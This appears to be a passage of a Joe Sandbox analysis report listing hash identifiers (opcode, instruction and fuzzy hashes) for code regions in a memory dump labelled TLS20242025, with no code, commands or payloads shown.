                                                  • Opcode ID: f3da1fa1acf0465fecf5239412870b7dc8858ffac268f4de6ab9c4b0f5021ead
                                                  • Instruction ID: a198b212386ceae0172d7b91dab347efce3b33489d0759daabe58174f05505d4
                                                  • Opcode Fuzzy Hash: f3da1fa1acf0465fecf5239412870b7dc8858ffac268f4de6ab9c4b0f5021ead
                                                  • Instruction Fuzzy Hash: FA61B674E00219CBDB68DF66D944BADBBB2FF88304F10C1A9D909A7655DB315981DF40
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b82235f9b6abd8062713df891c019e6bd8847e03a3a7e5de724c36c2aa1bd87
                                                  • Instruction ID: 1c447b96af6097067fb4455a82ff08a919bfb9497f9d44661d194ecb333c2a93
                                                  • Opcode Fuzzy Hash: 0b82235f9b6abd8062713df891c019e6bd8847e03a3a7e5de724c36c2aa1bd87
                                                  • Instruction Fuzzy Hash: C1412971D01248CBEB58DFBAD9446DEBBF2AF89300F24C52AC519BB265DB394946CF40
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76e07f2020ef1b13d9aab1fec6d0f15e72b5118c83de4eddb94f5c157ba81e61
                                                  • Instruction ID: ff1d53b7bb513e9d64a44696884886eefd75226c65605651a931e2d8f23f057b
                                                  • Opcode Fuzzy Hash: 76e07f2020ef1b13d9aab1fec6d0f15e72b5118c83de4eddb94f5c157ba81e61
                                                  • Instruction Fuzzy Hash: 5D412770E01248CBEB59DFAAD9486EDBBF2AF89300F20C529C519BB265DB345946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c602af9659aa08dae09f7527435ea8b28ae9e1824edb83e2420e318e9e57749
                                                  • Instruction ID: 202c2cae337ac790585296fc7d8d518c22cb248182f8970c28b1cd0e9caf7bc2
                                                  • Opcode Fuzzy Hash: 9c602af9659aa08dae09f7527435ea8b28ae9e1824edb83e2420e318e9e57749
                                                  • Instruction Fuzzy Hash: BF412770E012488BDB58DFAAD9446EDFBF2AF89300F20C539C419BB264DB394946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35fed3790b4714a030cba422c960d849bcf06832bbd9c1adb8e009a5e64c1d10
                                                  • Instruction ID: 4d7c5b167dd82cda0f5a2906917d9707d34c5f575505fac8cd19db41747c5c81
                                                  • Opcode Fuzzy Hash: 35fed3790b4714a030cba422c960d849bcf06832bbd9c1adb8e009a5e64c1d10
                                                  • Instruction Fuzzy Hash: B0411570E01248CBEB59DFBAD9446EDBBB2AF89300F24C52AC518AB255DB354946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 352046886990be60d0f02496b8566f71d630bb5383d5aef25d307ba4fe08c8b9
                                                  • Instruction ID: f243e2c586346fe22f4d669b3e03f493e687da784c492f9d4662aa5b6c77fb7f
                                                  • Opcode Fuzzy Hash: 352046886990be60d0f02496b8566f71d630bb5383d5aef25d307ba4fe08c8b9
                                                  • Instruction Fuzzy Hash: 51411570E01248CBEB58DFAAD9446EEFBB2AF89300F24C52AC514BB255DB345946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7119d3b3e0cc73824fa5d64338e9ac97985b93e8787187de22e438575cf50d5a
                                                  • Instruction ID: 20d1c984bb787110ac477cc3fa37c05b2a5bb570c885772567733d9c5481dfb5
                                                  • Opcode Fuzzy Hash: 7119d3b3e0cc73824fa5d64338e9ac97985b93e8787187de22e438575cf50d5a
                                                  • Instruction Fuzzy Hash: 13411570D012488BEB58DFAAD9446EDBBF2EF89300F20C539C519AB255EB355946CF40
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c332f2645e4bb71488cfb60011b6b41add084bd8fa2e413060f7f8270e56ee5
                                                  • Instruction ID: 045d31c3e1a98862faa0c906707367eec2bd1a38ff700d42de1ce9070f8f46e8
                                                  • Opcode Fuzzy Hash: 2c332f2645e4bb71488cfb60011b6b41add084bd8fa2e413060f7f8270e56ee5
                                                  • Instruction Fuzzy Hash: 02412570E002488BEB59CFAAC9446EDBBB2AFC9300F24C52AC515AB259EB344946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a726e67c9595a73a8fa370484846c0c73411e18a5f796e793f309c1582db4917
                                                  • Instruction ID: ec93c34c4fd98b6e85917915bf851def803c6d83c52885cfe5a04e9318db1993
                                                  • Opcode Fuzzy Hash: a726e67c9595a73a8fa370484846c0c73411e18a5f796e793f309c1582db4917
                                                  • Instruction Fuzzy Hash: 2C41E270E012488BEB58DFAAD9446EDBBB2BF89300F24C12AC419BB255EB344946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 497c627243ca6d5e383408dd731b502ba9570157ea59d435d768c20ef0013832
                                                  • Instruction ID: a2bead85a9297e3ebc2aaa23a93d0ca414f35d5e366e6dcb2733a9ad79da92e6
                                                  • Opcode Fuzzy Hash: 497c627243ca6d5e383408dd731b502ba9570157ea59d435d768c20ef0013832
                                                  • Instruction Fuzzy Hash: D041E370E01248CBEB58DFAAD9446EDFBF2AF89300F24C12AC419BB258DB345946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a796e673a3adbfcf6c6d338a111b15b52ce8de6acd6a66593e63a599320a77d
                                                  • Instruction ID: d8186fd74059f399818ef9230ca1f4fee54310d29aa84f92899da7e786977638
                                                  • Opcode Fuzzy Hash: 2a796e673a3adbfcf6c6d338a111b15b52ce8de6acd6a66593e63a599320a77d
                                                  • Instruction Fuzzy Hash: 1741F470E01248CBEB58DFAAD9446EDFBF2AF89300F24C52AC419BB258DB354946CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4590356989.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_67d0000_TLS20242025.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd44b3e6101871f256626a7d685b33154f67c1a7de23b18643fe3522807118c2
                                                  • Instruction ID: b1c81625b23754b2205ef596c8270eec94044fdfd396a4eb9dc7b92c1d1ece42
                                                  • Opcode Fuzzy Hash: cd44b3e6101871f256626a7d685b33154f67c1a7de23b18643fe3522807118c2
                                                  • Instruction Fuzzy Hash: DB31F470E00248CBDB68DFAAD5446ADFBF2AF89300F24C52AC419AB259DB355946CF40